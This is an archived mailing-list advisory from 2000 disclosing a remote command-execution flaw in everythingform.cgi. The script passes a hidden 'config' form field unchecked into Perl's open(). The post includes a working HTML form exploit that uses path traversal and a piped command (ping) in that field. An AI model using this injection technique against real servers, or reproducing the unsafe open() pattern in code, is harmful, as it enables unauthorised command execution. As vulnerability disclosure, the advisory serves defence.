|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Insecure input validation in everythingform.cgi (remote command execution)
From: rpc (h
CKZ.ORG)Date: Mon Dec 11 2000 - 08:16:03 CST
- Next message: Matthew Franz: "Re: format string in ssl dump"
- Previous message: rpc: "Insecure input validation in simplestmail.cgi (remote command execution)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi All,
This is Yet Another Bad Perl Script. everythingform.cgi uses a hidden field
'config' to determine where to read configuration data from.
--code snippit--
..
$ConfigFile = $in{config};
..
open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in
the ReadConfig subroutine. Reason: $!");
------------
Information regarding everythingform can be found at:
http://www.conservatives.net/atheist/scripts/index.html?everythingform
Sample exploit:
<form action="http://www.conservatives.net/someplace/everythingform.cgi"
method=POST>
<h1>everythingform.cgi exploit</h1>
Command: <input type=text name=config value="../../../../../../../../bin/ping
-c 5 www.foobar.com|">
<input type=hidden name=Name value="fuck the religious right">
<input type=hidden name="e-mail" value="foobar.net">
<input type=hidden name=FavoriteColor value=Black>
<input type=submit value=run>
</form>
--rpc
- Next message: Matthew Franz: "Re: format string in ssl dump"
- Previous message: rpc: "Insecure input validation in simplestmail.cgi (remote command execution)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]